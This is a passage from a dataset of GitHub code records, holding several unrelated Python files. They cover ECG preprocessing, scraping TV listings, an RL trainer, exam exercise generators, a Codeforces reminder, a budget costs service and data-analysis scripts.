= pd.concat([source_dataframe, pd.DataFrame(patient_rows)])\n \n dataframes[f'{source_folder_name}_df'] = source_dataframe\n \n return dataframes\n\n\n#===================================================================================================\n\n# Function for normializing the wave \n#parameters \n# wave form representing the array\n# frequency for normalization\n# frequency of the waveform\ndef normalize_wave(array,nrm_freq,freq):\n factor = round(freq/nrm_freq)\n normalized_array = []\n for ele in array:\n new_ele = ele[::factor]\n normalized_array.append(new_ele)\n return len(normalized_array[0]),np.array(normalized_array)\n\n\n#===================================================================================================\n\ndef normalize_mats(dir_path):\n # This function will iterate thorugh a data directory and return a list of \n # nomlized waveforms for the ECG's in that directory\n normalized_waves = []\n lengths = []\n # Iterating through the subdirectories inside the given directory\n for subdir in pl.Path(dir_path).iterdir():\n if subdir.is_dir():\n \n data_dir = pl.Path(subdir)\n head_file_list = list(data_dir.glob('*.hea'))\n mat_file_list = list(data_dir.glob('*.mat'))\n for i in range(len(head_file_list)):\n head_file_path = data_dir.joinpath(head_file_list[i].name)\n mat_file_path = data_dir.joinpath(mat_file_list[i].name)\n\n data = scipy.io.loadmat(mat_file_path)['val']\n current_frequency = int(read_heafile(head_file_path)[0].split()[2])\n length,nomralized_wave = normalize_wave(data,250,current_frequency)\n normalized_waves.append(nomralized_wave)\n lengths.append(length)\n return lengths,normalized_waves\n\n\n#===================================================================================================\n\ndef read_heads(dir_path):\n # this function will create a arrays of frequencies,number of points and combination of them\n freq_array = []\n pts_array = []\n both = []\n # Iterating through the subdirectories inside the given directory\n for subdir in pl.Path(dir_path).iterdir():\n if subdir.is_dir():\n \n data_dir = pl.Path(subdir)\n file_list = list(data_dir.glob('*.hea'))\n \n for file in file_list:\n file_path = data_dir.joinpath(file.name)\n data = read_heafile(file_path)\n freq = int(data[0].split()[2])\n points = int(data[0].split()[3].strip('\\n'))\n freq_array.append(freq)\n pts_array.append(points)\n both.append([freq,points])\n \n return freq_array,pts_array,both\n\n\n#===================================================================================================\n\ndef create_anomalies_array(data):\n \"\"\"\n This function will take a .csv file as the input.\n It will create a array containing all the anomalies\n \"\"\"\n anomalies_array = []\n \n for index,row in data.iterrows():\n anomalies_array.append(row['SNOMED CT Code'])\n \n return anomalies_array\n\n#===================================================================================================\n\ndef create_single_output_array(array,anomalies):\n \"\"\"\n This will take the anomalies array and the array of anomalies of a patient\n This will output an array conatinimg binary values.\n It represents the 1 when a patient has the relavent anomaly , otherwise 0\n \"\"\"\n data = create_anomalies_array(anomalies)\n \n for i in range(len(data)):\n if(data[i] in array):\n data[i] = 1\n else:\n data[i] = 0\n return data\n\n#===================================================================================================\n\ndef create_output_array(df,anomalies):\n \"\"\"\n This will take anomalies array and a data frame as the input\n This will output the Y data set \n \"\"\"\n Y = []\n \n for index,row in df.iterrows():\n # Create the anomalies array for the relavent row\n # --------code here---------\n array = []\n \n output = create_single_output_array(array,anomalies)\n Y.append(output)\n \n return np.array(Y)\n\n\n#===================================================================================================\n\ndef create_y_array(df,data,source_file):\n \"\"\"\n This function will take a dataframe(heads),csv of anomalies and a list of source files\n This will output the Y array for the given source files(Y array is the array conatining training labels)\n \"\"\"\n Y = []\n for ele in source_file:\n y = create_output_array(df[ele],data)\n Y = Y + y\n return Y\n\n#===================================================================================================\n\ndef create_x_array(source_file):\n \"\"\"\n This function will take a list of source files\n This will output the X array for the given source files(X array is the array conatining training X data)\n \"\"\"\n\n X = []\n lengths = []\n for ele in source_file:\n length,array = normalize_mats('training/' + ele)\n lengths = lengths + length\n X = X + array\n return X,lengths\n\n\n#===================================================================================================\n\ndef equalizing_wave_array(x_copy):\n \"\"\"\n This function will take the X array and equalize the length of the waves\n \"\"\"\n x_copy_new = []\n for ele in x_copy:\n \n size = len(ele[0])\n\n # If the size of the teh array is less than 2617 it will add noice at the end and begining \n if(size < 2617):\n \n start = round((2617 - size)/2)\n end = 2617 - size - start\n \n new_array = []\n \n for data in ele:\n\n lower_bound,upper_bound = min(data),max(data)\n \n start_list = [random.randint(lower_bound, upper_bound) for _ in range(start)]\n end_list = [random.randint(lower_bound, upper_bound) for _ in range(end)]\n \n new_sub_array = np.array(start_list + list(data) + end_list)\n new_array.append(new_sub_array)\n \n x_copy_new.append(new_array)\n \n # Else it will simmply catoff the extra part from the begining and the end\n else:\n extra = size - 2617\n half_extra = round(extra)\n \n new_array = []\n \n for data in ele:\n new_sub_array = list(data)[(half_extra-1):(half_extra + 2616)]\n new_array.append(new_sub_array)\n x_copy_new.append(new_array)\n\n\n return x_copy_new\n\n\n\n#===================================================================================================\n\ndef process_input(array,freq):\n\n \"\"\"\n This function will process the input so that it could be fed in to the model and do the prediction\n When the input array and the frequency is given it will return a array of size (1,12,2617) by\n Normalizing and Reshaping the wave\n \"\"\"\n \n size,normlaized_wave = normalize_wave(array,250,freq)\n \n \n if(size < 2617):\n \n start = round((2617 - size)/2)\n end = 2617 - size - start\n \n new_array = []\n for data in normlaized_wave:\n \n lower_bound,upper_bound = min(data),max(data)\n \n start_list = [random.randint(lower_bound, upper_bound) for _ in range(start)]\n end_list = [random.randint(lower_bound, upper_bound) for _ in range(end)]\n \n new_sub_array = np.array(start_list + list(data) + end_list)\n new_array.append(new_sub_array)\n \n return np.expand_dims(np.array(new_array),axis = 0)\n else:\n \n extra = size - 2617\n half_extra = round(extra/2)\n \n new_array = []\n \n for data in normlaized_wave:\n new_sub_array = list(data)[(half_extra-1):(half_extra + 2616)]\n new_array.append(new_sub_array)\n \n return np.expand_dims(np.array(new_array),axis = 0)\n \n\n#===================================================================================================\n\ndef get_best_(array,df):\n table_data = {\n 'Abnormality' : [],\n 'SNOMED CT Code' : [],\n 'Abbrevation' : [],\n 'Probability' : []\n }\n\n sorted_array = sorted(array)[::-1]\n for ele in sorted_array[0:9]:\n index = array.index(ele)\n row_data = df.iloc[index]\n table_data['Abnormality'].append(row_data['Dx'])\n table_data['SNOMED CT Code'].append(row_data['SNOMED CT Code'])\n table_data['Abbrevation'].append(row_data['Abbreviation'])\n table_data['Probability'].append(ele)\n\n df = pd.DataFrame(table_data)\n\n return df","repo_name":"IsuruGunarathne/CardioScanPro","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32015295240","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport argparse\nimport re\nimport subprocess\nfrom requests import post,get\nimport logging\nimport string\nimport html\n#import yaml\n\n\nparser = argparse.ArgumentParser()\n\n#group = parser.add_mutually_exclusive_group(required=True)\n\nparser.add_argument(\"-p\", \"--process\", help=\"process raw.txt\", action='count')\nparser.add_argument(\"--refresh_amz\", help=\"refresh lists\", action='count')\nparser.add_argument(\"--refresh_nf\", help=\"refresh lists\", action='count')\n\nparser.add_argument(\"-v\", \"--verbose\", help=\"verbose output, can be specified multiple times\", action=\"count\")\n\nargs = parser.parse_args()\n\nLOG_FILE='./netflix.log'\nlogging.basicConfig(level=logging.DEBUG, filename=LOG_FILE, filemode=\"a+\",\n format=\"%(asctime)-15s %(levelname)-8s %(message)s\")\n\ndef log(*msg):\n #logging.info(\" \".join(msg))\n print (msg);\n\ndef clean_title(title):\n title = re.sub(\" Season [0-9]+\",'', title)\n title = title.replace('.','_')\n title = title.replace('+','and')\n title = title.replace(',','_')\n title = title.replace(' ','_')\n title = title.replace('!','')\n title = title.replace('?','')\n title = title.replace(':','_')\n title = title.replace(\"'\",'')\n title = title.replace(\"&\",'and')\n title = title.replace(\"*\",'_')\n title = title.replace(\"(\",'_')\n title = title.replace(\")\",'_')\n title = re.sub(\"_$\",'', title)\n return title\n\ndef clean_long_title(title):\n title = re.sub(\" Season [0-9]+\",'', title)\n title = title.replace('&','and')\n title = title.replace('+','and')\n title = title.replace(':','and')\n title = title.replace(',','')\n return title\n\nif args.refresh_nf:\n with open('../apps/jarvis/tv_netflix_raw.txt', 'w') as outfile:\n outfile.seek(0)\n for page in range(1, 21):\n url = (\"http://instantwatcher.com/search?page={}\"\n \"genres=83&page_title=TV+Series&sort=queue_count+desc&\"\n \"view=text&average_rating=32-max&content_type%5B%5D=3&\"\n \"maturity_rating_level%5B%5D=6&maturity_rating_level%5B%5D=8&\"\n \"maturity_rating_level%5B%5D=10&language_audio=18\".format(page))\n print(url)\n response = get(url)\n outfile.write(str(response.content))\n infile1 = open('../apps/jarvis/tv_extra.txt', 'r')\n for line in infile1:\n line = line.replace(' ','%20')\n line = line.rstrip()\n url = (\"http://instantwatcher.com/search?\"\n \"q={}&view=text&content_type%5B%5D=2&content_type%5B%5D=3&\"\n \"maturity_rating_level%5B%5D=2&maturity_rating_level%5B%5D=5&\"\n \"maturity_rating_level%5B%5D=6&maturity_rating_level%5B%5D=8&\"\n \"maturity_rating_level%5B%5D=9&\"\n \"maturity_rating_level%5B%5D=10\".format(line))\n print(url)\n response = get(url)\n outfile.write(str(response.content))\n infile1.close()\n outfile.truncate()\n outfile.close()\n\nif args.refresh_amz:\n with open('../apps/jarvis/tv_amazon_raw.txt', 'w') as outfile:\n outfile.seek(0)\n for page in range(1, 29):\n url = (\"http://instantwatcher.com/a/search?\"\n \"page_title=Prime+TV&page={}sort=ratings_count+desc&view=text&\"\n \"&year=1950-max&amzn_rating=6-max&prime%5B%5D=2&\"\n \"content_type%5B%5D=2&quality%5B%5D=1&quality%5B%5D=2&\"\n \"maturity_rating_level%5B%5D=2&maturity_rating_level%5B%5D=5&\"\n \"maturity_rating_level%5B%5D=6&maturity_rating_level%5B%5D=8&\"\n \"maturity_rating_level%5B%5D=9&\"\n \"maturity_rating_level%5B%5D=10\".format(page))\n print(url)\n response = get(url)\n outfile.write(str(response.content))\n infile1 = open('../apps/jarvis/tv_extra.txt', 'r')\n for line in infile1:\n line = line.replace(' ','%20')\n url = (\"http://instantwatcher.com/search?page_title=Prime+TV&\"\n \"q={}&view=text&content_type%5B%5D=2&content_type%5B%5D=3&\"\n \"maturity_rating_level%5B%5D=2&maturity_rating_level%5B%5D=5&\"\n \"maturity_rating_level%5B%5D=6&maturity_rating_level%5B%5D=8&\"\n \"maturity_rating_level%5B%5D=9&\"\n \"maturity_rating_level%5B%5D=10\".format(line))\n print(url)\n response = get(url)\n outfile.write(str(response.content))\n infile1.close()\n\n\n outfile.truncate()\n outfile.close()\n\nshows = {}\n\nif args.process:\n\n with open('../apps/jarvis/tv_netflix_raw.txt', 'r') as infile:\n infile.seek(0)\n for line in infile:\n match = re.findall(\n \"data-title-id=\\\"[0-9]+\\\">[a-zA-Z0-9 \\:\\`\\'\\&\\*\\#\\;\\.\\,\\?]+\",\n line)\n for title in match:\n #print(title)\n contentid_match = re.search('[0-9]+', title)\n title_match = re.search('>(.*)', title)\n content_id = contentid_match.group(0)\n title = str(html.unescape(title_match.group(1)))\n long_title = title\n season = '1'\n title = clean_title(title)\n long_title = clean_long_title(long_title)\n title = re.sub(\" Season [0-9]+\",'', title)\n\n shows[title]={'title': title,\n 'long_title': long_title,\n 'channel': '12',\n 'seasons': {\n season: content_id\n }\n }\n with open('../apps/jarvis/tv_amazon_raw.txt', 'r') as infile:\n infile.seek(0)\n for line in infile:\n matches = re.findall(\n \"data-title-id=\\\"[0-9]+\\\">[a-zA-Z0-9 \\:\\`\\'\\&\\*\\#\\;\\.,]+.*?\"\n \"ref=atv_feed_catalog\",\n line)\n for match in matches:\n title_match = re.search('>(.*?)<', match)\n title = str(html.unescape(title_match.group(1)))\n print(title)\n contentid_match = re.search('product\\/([A-Z0-9]+)\\/ref', match)\n content_id = contentid_match.group(1)\n season_match = re.search('Season ([0-9]+)', match)\n season = season_match.group(1) if season_match else '1'\n season = str(int(season))\n #print(content_id)\n long_title = title\n long_title = clean_long_title(long_title)\n title = clean_title(title)\n\n if not shows.get(title):\n shows[title] = {}\n shows[title].update({'title': title,\n 'long_title': long_title,\n 'channel': '13',\n })\n if not shows[title].get('seasons'):\n shows[title]['seasons'] = {}\n\n #print(shows[title])\n #print(shows[title]['seasons'])\n #print(season, content_id)\n shows[title]['seasons'].update({\n season: content_id\n })\n #print(shows[title]['seasons'])\n #print(shows[title])\n\n\n\n\n outfile1 = open('../apps/jarvis/tv.yaml', 'w')\n outfile2 = open('../apps/jarvis/tv.txt', 'w')\n outfile1.seek(0)\n outfile2.seek(0)\n\n infile1 = open('../apps/jarvis/tv_extra.txt', 'r')\n for line in infile1:\n outfile2.write(line)\n\n# print(shows)\n for show, value in shows.items():\n #print(show)\n print(\"%s:\" % show)\n# print(\" channel: %s\" % value['channel'] )\n# print(\" seasons:\")\n\n outfile1.write('%s:\\n' % show )\n outfile1.write(' long_title: \"%s\"\\n' % value['long_title'])\n outfile1.write(' channel: %s\\n' % value['channel'])\n outfile1.write(' seasons: \\n')\n for season, content_id in value['seasons'].items():\n #print(\" %s: %s\" % (season, content_id))\n outfile1.write(\" %s: %s\\n\" % (season, content_id))\n\n outfile2.write('%s\\n' % value['long_title'])\n\n infile1.close()\n outfile1.truncate()\n outfile1.close()\n outfile2.truncate()\n outfile2.close()\n","repo_name":"tschmidty69/jarvis-appdaemon","sub_path":"jarvis/jarvis_tv/data/fetch_netflix_ids.py","file_name":"fetch_netflix_ids.py","file_ext":"py","file_size_in_byte":8234,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"15115337864","text":"import time\nimport os\nfrom deeprl.trainer import Trainer\nfrom deeprl.agents.pg_agent import PGAgent\nfrom deeprl.agents.ac_agent import ACAgent\nfrom deeprl.agents.dqn_agent import DQNAgent\n\ndef get_trainer(params):\n \n if (params['agent_name']=='pg'):\n params['agent_class'] = PGAgent\n params['train_batch_size'] = params['batch_size']\n elif (params['agent_name']=='a2c'):\n params['agent_class'] = ACAgent\n params['train_batch_size'] = params['batch_size']\n elif (params['agent_name']=='dqn'):\n params['agent_class'] = DQNAgent\n elif (params['agent_name']=='ddqn'):\n params['agent_class'] = DQNAgent\n else:\n print('Agent not implememnted. Terminating...')\n return\n\n agent_params = {\n 'batch_size': params['batch_size'],\n 'train_batch_size': params['train_batch_size'],\n 'eval_batch_size': params['eval_batch_size'],\n\n 'gamma': params['gamma'],\n 'learning_rate': params['learning_rate'],\n 'n_layers': params['n_layers'],\n 'size': params['size'],\n \n 'use_gpu': params['use_gpu'],\n 'which_gpu': params['which_gpu'],\n\n 'num_critic_updates_per_agent_update': params['num_critic_updates_per_agent_update'],\n 'num_actor_updates_per_agent_update': params['num_actor_updates_per_agent_update'],\n 'num_target_updates': params['num_target_updates'],\n 'num_grad_steps_per_target_update': params['num_grad_steps_per_target_update'],\n 'target_update_freq': params['target_update_freq'],\n\n 'double_q': params['agent_name']=='ddqn'\n }\n\n params['agent_params'] = agent_params\n\n # Initiate logger path\n data_path = './runs'\n logdir = params['exp_name'] or params['agent_name']+'_'+ params['env_name']+'_'+time.strftime(\"%d-%m-%Y_%H-%M-%S\")\n logdir = os.path.join(data_path, logdir)\n params['logdir'] = logdir\n if not(os.path.exists(logdir)):\n os.makedirs(logdir)\n else:\n for f in os.listdir(logdir):\n os.remove(os.path.join(logdir, f))\n print(\"LOGGING TO: \", logdir)\n \n return Trainer(params)\n\ndef main():\n\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--env_name', type=str)\n parser.add_argument('--exp_name', type=str)\n parser.add_argument('--agent_name', type=str, default='ddqn')\n \n parser.add_argument('--epoch_size', type=int, default=200)\n parser.add_argument('--itr_per_epoch', type=int, default=10) # num of iterations per epoch for agent\n \n parser.add_argument('--num_critic_updates_per_agent_update', type=int, default=1)\n parser.add_argument('--num_actor_updates_per_agent_update', type=int, default=1)\n parser.add_argument('--num_target_updates', '-ntu', type=int, default=100)\n parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=1)\n parser.add_argument('--target_update_freq', type=int, default=1) # dqn target update frequency\n\n parser.add_argument('--batch_size', '-b', type=int, default=1000) #steps collected per iteration\n parser.add_argument('--train_batch_size', '-tb', type=int, default=500) #steps collected per train iteration\n parser.add_argument('--eval_batch_size', '-eb', type=int, default=100) #steps collected per eval iteration\n parser.add_argument('--ep_len', type=int)\n\n parser.add_argument('--gamma', type=float, default=1.0)\n parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)\n parser.add_argument('--n_layers', '-l', type=int, default=2)\n parser.add_argument('--size', '-s', type=int, default=64)\n \n parser.add_argument('--seed', type=int, default=1)\n parser.add_argument('--use_gpu', '-gpu', action='store_true')\n parser.add_argument('--which_gpu', '-gpu_id', default=0)\n \n # parser.add_argument('--video_log_freq', type=int, default=-1)\n # parser.add_argument('--scalar_log_freq', type=int, default=1)\n # parser.add_argument('--save_params', action='store_true')\n\n args = parser.parse_args()\n\n # convert to dictionary\n params = vars(args)\n\n trainer = get_trainer(params)\n trainer.train()\n trainer.run_env()\n trainer.logger.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"RaindragonD/deeprl-pytorch","sub_path":"deeprl/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38657688025","text":"def readHotels():\n count = None\n distance = None\n hotel_distances = []\n hotel_ratings = []\n best = None\n baddest = None\n while True:\n file_name = input(\"Please enter hotel meta file path: \")\n try:\n with open(file_name, \"r\") as f:\n count = int(f.readline())\n distance = float(f.readline())\n for i in range(count):\n line = f.readline().split(\" \")\n hotel_distances.append(float(line[0]))\n hotel_ratings.append(float(line[1]))\n best = max(hotel_ratings)\n return best, distance, hotel_distances, hotel_ratings\n except:\n print(file_name, \"doesn't exist or is no hotel meta file.\")","repo_name":"hexszeug/bwinf-40-dev","sub_path":"1_Runde/2_Aufgabe/2_try/src/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26940112587","text":"import random\n\ndef text(concrete_str): # принимает конкретную строку из бд, возвращает задание и ответ\n if concrete_str[1] == 1: # Первый тип\n cur = concrete_str[3] # Выбираем текст задания\n number = random.randint(70, 135) # Генерируем число\n cur = cur.replace(\"#N1\", str(number))\n answer = exc6_1(number) # Вызываем функцию, которая возвращает ответ в виде str\n result = [cur, answer]\n return result\n if concrete_str[1] == 2:\n cur = concrete_str[3] # Выбираем текст задания\n number = random.randint(157, 245) # Генерируем число\n cur = cur.replace(\"#N1\", str(number))\n answer = exc6_2(number) # Вызываем функцию, которая возвращает ответ в виде str\n result = [cur, answer]\n return result\n if concrete_str[1] == 3:\n cur = concrete_str[3] # Выбираем текст задания\n number = random.randint(21, 201) # Генерируем число\n cur = cur.replace(\"#N1\", str(number))\n answer = exc6_3(number) # Вызываем функцию, которая возвращает ответ в виде str\n result = [cur, answer]\n return result\n if concrete_str[1] == 4:\n cur = concrete_str[3] # Выбираем текст задания\n number = 0\n while number % 2 == 0:\n number = random.randint(43, 177) # Генерируем нечетное число\n cur = cur.replace(\"#N1\", str(number))\n answer = exc6_4(number) # Вызываем функцию, которая возвращает ответ в виде str\n result = [cur, answer]\n return result\n\ndef from10toX(number, ss):\n result = 0\n count = 0\n count_of_1 = 0\n count_of_0 = 0\n while number != 0:\n result += (number % ss) * 10 ** count\n number //= ss\n count += 1\n return result\n\ndef number_of_1(number):\n count_of_1 = 0\n while number != 0:\n if number % 2 == 1:\n count_of_1 += 1\n number //= 10\n return count_of_1\n\ndef from2to10(n):\n count = 0\n result = 0\n while n != 0:\n result += (2**count) * (n % 2)\n n //= 10\n count += 1\n return result\n\ndef algorithm_1(N):\n for i in range(2):\n curr = number_of_1(N)\n if curr % 2 == 0:\n N *= 10\n else:\n N = N*10 + 1\n return N\n\ndef exc6_1(number):\n R = from10toX(number, 2)\n N = R // 100\n while R != N:\n number += 1\n R = from10toX(number, 2)\n N = R // 100\n N = algorithm_1(N)\n print(N)\n N = from2to10(N)\n print(N)\n return str(N)\n\ndef exc6_2(number):\n number -= 1\n result = 255 - number\n return str(result)\n\ndef exc6_3(number):\n result = 256 - number\n return str(result)\n\ndef exc6_4(number):\n result = int((255 - number) / 2)\n return str(result)\n\n\n\n","repo_name":"JuliaChernykh/ChatBot","sub_path":"Bot/exc6.py","file_name":"exc6.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2442653805","text":"import pickle\nfrom keyfeatures_2_riccardo import getTime\nfrom statistics import mean, stdev\nimport matplotlib.pyplot as plt\n\n\n# Only for one time slice\ntimeSlice = 0\n\n# Path to key features\npath_KF_PushShift = \"Results/Pushshift\"\nsubreddits_PushShift = [\"CMV\", \"News\", \"The_Donald\"]\n\npath_KF = f\"Results/{getTime(timeSlice)}\"\nsubreddits = ['atheism',\n 'christianity',\n 'conservative',\n 'conspiracy',\n 'exchristian',\n 'flatearth',\n 'liberal',\n 'lockdownskepticism',\n 'news',\n 'politics',\n 'science']\n\n# Load key features of UN\nKF_UN_PushShift = {}\nKF_UN = {}\n\n# PushShift\nfor subreddit in subreddits_PushShift:\n with open(path_KF_PushShift + f'/{subreddit}_key_features.pickle', 'rb') as f:\n KF_UN_PushShift[subreddit] = pickle.load(f)\n\n# Other\nfor subreddit in subreddits:\n with open(path_KF + f'/{subreddit}_key_features.pickle', 'rb') as f:\n KF_UN[subreddit] = pickle.load(f)\n\n# Load key features of PCN\nKF_PCN_PushShift = {subreddit: dict() for subreddit in subreddits_PushShift}\nKF_PCN = {subreddit: dict() for subreddit in subreddits}\n\n# PushShift\nwith open(path_KF_PushShift + f'/key_features_PCN.pickle', 'rb') as f:\n data = pickle.load(f)\n\n for KF, val in data.items():\n\n # KF are subreddit specific\n if type(val) == dict:\n for subreddit in val.keys():\n KF_PCN_PushShift[subreddit][KF] = val[subreddit]\n\n# Other\nwith open(path_KF + f'/key_features_PCN.pickle', 'rb') as f:\n data = pickle.load(f)\n\n for KF, val in data.items():\n\n # KF are subreddit specific\n if type(val) == dict:\n for subreddit in val.keys():\n KF_PCN[subreddit][KF] = val[subreddit]\n\n\n# Compute key feature statistics\n\ndef computeStatistics(dictionary):\n # Output structure\n KF_Stats = {subreddit: dict() for subreddit in dictionary.keys()}\n\n # Non-numerical KFs\n excluding_KF = [\"Communities\", \"VoteRank\"]\n\n for subreddit in dictionary.keys():\n for key in dictionary[subreddit].keys():\n if key not in excluding_KF:\n data = dictionary[subreddit][key]\n if type(data) == list:\n KF_Stats[subreddit][key] = [mean(data)] # could add stdev later\n elif type(data) == dict:\n KF_Stats[subreddit][key] = [mean(data.values())]\n\n return KF_Stats\n\n## PushShift\n\n# Statistics for UN\nKF_UN_PushShift_Stats = computeStatistics(KF_UN_PushShift)\n\n# Statistics for PCN\nKF_PCN_PushShift_Stats = computeStatistics(KF_PCN_PushShift)\n\n## Other\n\n# Statistics for UN\nKF_UN_Stats = computeStatistics(KF_UN)\n\n# Statistics for PCN\nKF_PCN_Stats = computeStatistics(KF_PCN)\n\n# Function to produce a scatter grid\ndef scatterGrid(dict_x, dict_y, fName):\n # Get the names of the KFs\n KF_List_x = list(dict_x[list(dict_x.keys())[0]].keys())\n KF_List_y = list(dict_y[list(dict_y.keys())[0]].keys())\n\n n_KF_x = len(KF_List_x)\n n_KF_y = len(KF_List_y)\n\n\n fig, axs = plt.subplots(ncols=n_KF_x, nrows=n_KF_y, figsize=(n_KF_x * 5,n_KF_y * 5))\n\n for i,j in [(i,j) for i in range(n_KF_y) for j in range(n_KF_x)]:\n axs[i][j].scatter(\\\n x = [dict_x[subreddit][KF_List_x[j]][0] for subreddit in dict_x.keys()],\\\n y = [dict_y[subreddit][KF_List_y[i]][0] for subreddit in dict_y.keys()])\n\n axs[i][j].set_xlabel(KF_List_x[j])\n axs[i][j].set_ylabel(KF_List_y[i])\n\n saveFolder = \"KeyFeaturePlots/\"\n plt.tight_layout()\n fig.savefig(saveFolder + fName + '.png')\n\n\n## PushShift\n\n# Scatter grid only UN\nscatterGrid(KF_UN_PushShift_Stats, KF_UN_PushShift_Stats, \"KF_UN_PushShift_UN_PushShift\")\n\n# Scatter grid only PCN\nscatterGrid(KF_PCN_PushShift_Stats, KF_PCN_PushShift_Stats, \"KF_PCN_PushShift_PCN_PushShift\")\n\n# Scatter grid both UN and PCN\nscatterGrid(KF_UN_PushShift_Stats, KF_PCN_PushShift_Stats, \"KF_UN_PushShift_PCN_PushShift\")\n\n## Other\n\n# Scatter grid only UN\nscatterGrid(KF_UN_Stats, KF_UN_Stats, \"KF_UN_UN\")\n\n# Scatter grid only PCN\nscatterGrid(KF_PCN_Stats, KF_PCN_Stats, \"KF_PCN_PCN\")\n\n# Scatter grid both UN and PCN\nscatterGrid(KF_UN_Stats, KF_PCN_Stats, \"KF_UN_PCN\")","repo_name":"Ana-Maria-O/Echo-Chambers","sub_path":"ComparisonPCN_UN.py","file_name":"ComparisonPCN_UN.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"825931350","text":"from bs4 import BeautifulSoup \nfrom datetime import datetime, timedelta\nimport requests\nimport re\nimport time\nimport subprocess\n\n\ndef sendmessage(header,message):\n subprocess.Popen(['notify-send', header,message])\n return\n\n\ndef get_upcoming_contests(url):\n\tsoup = BeautifulSoup(requests.get(url).text, \"lxml\")\n\ttables = soup.findAll(\"table\")\n\tupcoming_table = tables[0]\n\trows = upcoming_table.findAll(\"tr\")\n\tconcerned = []\n\tfor row in rows[1:]:\n\t\ttry:\n\t\t\tcontest_name = row.findAll(\"td\")[0].find(text = True)\n\t\t\ttemp = datetime.strptime(row.findAll(\"td\")[4].find(\"span\").find(text = True), '%H:%M:%S')\n\t\t\tbefore_start = timedelta(hours = temp.hour, minutes = temp.minute, seconds = temp.second)\n\t\t\tconcerned.append({\"name\": contest_name, \"time left\": before_start})\n\t\texcept:\n\t\t\tcontinue\n\treturn concerned\n\n\ndef notify_these(contests):\n\tfifteen_m = timedelta(minutes = 15)\n\tfor x in contests:\n\t\tif fifteen_m >= x['time left']:\n\t\t\theader = 'Codeforces reminder!' \n\t\t\tmessage = x['name'] + \"\\nStarts in \" + str(x['time left'])\n\t\t\tsendmessage(header, message)\n\n\nif __name__ == \"__main__\":\n\turl = \"http://codeforces.com/contests\"\n\twhile True:\n\t\ttry:\n\t\t\tnotify_these(get_upcoming_contests(url))\n\t\t\ttime.sleep(5*60)\n\t\texcept:\n\t\t\ttime.sleep(5*60)\n","repo_name":"Parth7/NTU","sub_path":"cf.py","file_name":"cf.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70720484073","text":"import asyncio\nfrom typing import AsyncGenerator\n\nfrom src.domain.costs.models import Cost, CostInDB, CostUncommited\nfrom src.domain.costs.repository import CostsCRUD\nfrom src.domain.dates import DateFormat\nfrom src.domain.dates import services as dates_services\nfrom src.domain.money import CurrenciesCRUD\nfrom src.infrastructure.cache import Cache\nfrom src.infrastructure.errors import NotFound\n\n\nasync def add(schema: CostUncommited) -> Cost:\n \"\"\"Adding the cost means:\n 1. Adding record to the costs table.\n 2. Changing the currencies table's equity value.\"\"\"\n\n cost_in_db: CostInDB = await CostsCRUD().create(schema)\n\n await CurrenciesCRUD().decrease_equity(\n id_=cost_in_db.currency_id, value=cost_in_db.value\n )\n cost: Cost = await CostsCRUD().get(id_=cost_in_db.id)\n\n return cost\n\n\nasync def delete(cost: Cost):\n \"\"\"Delete the cost means:\n 1. Delete the record from the costs table.\n 2. Changing the currencies table's equity value.\"\"\"\n\n await CurrenciesCRUD().increase_equity(\n id_=cost.currency.id, value=cost.value\n )\n await CostsCRUD().delete(id_=cost.id)\n\n\nasync def get_last_months(\n limit: int | None = None,\n) -> AsyncGenerator[str, None]:\n \"\"\"Fetch last months from the cache or database.\n If data is fetched from the database it saves to the cache then.\n\n This function mostly is created in order to be used\n for costs delete operation.\"\"\"\n\n try:\n first = Cache.get(namespace=\"costs\", key=\"first_date\")\n last = Cache.get(namespace=\"costs\", key=\"last_date\")\n except NotFound:\n crud = CostsCRUD()\n first, last = await asyncio.gather(crud.first(), crud.last())\n Cache.set(\n namespace=\"costs\",\n key=\"first_date\",\n instance=first,\n )\n Cache.set(\n namespace=\"costs\",\n key=\"last_date\",\n instance=last,\n )\n\n for index, item in enumerate(\n dates_services.represent_dates_range(\n first.date, last.date, DateFormat.MONTHLY\n )\n ):\n if limit and index > limit:\n break\n\n yield item\n","repo_name":"parfeniukink/family_budget_bot","sub_path":"src/domain/costs/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"1229428747","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 21 19:06:02 2022\n\n@author: bened\n\"\"\"\n\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nimport pandas as pd\nfrom sklearn.datasets import fetch_california_housing\nimport itertools\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\n\nhousing = fetch_california_housing()\n\n# Converting sklearn Bunch object into pandas data frame\n# Without target column\nhousing_df = pd.DataFrame(data=housing['data'], columns=housing['feature_names'])\n\n\n#######################\n######## 2.1.1 ########\n#######################\n\n\n# There have to be 56 unique combinations for taking subsets of 3 (k) from 8 (n) features:\n# n!/k!(n-k)! = 8!/3!5! = 56\ndef get_subsets(features):\n comb_all= list(itertools.combinations(features,3)) # all combinations as tuples\n comb_all = [list(t) for t in comb_all] # format for indexing in pd data 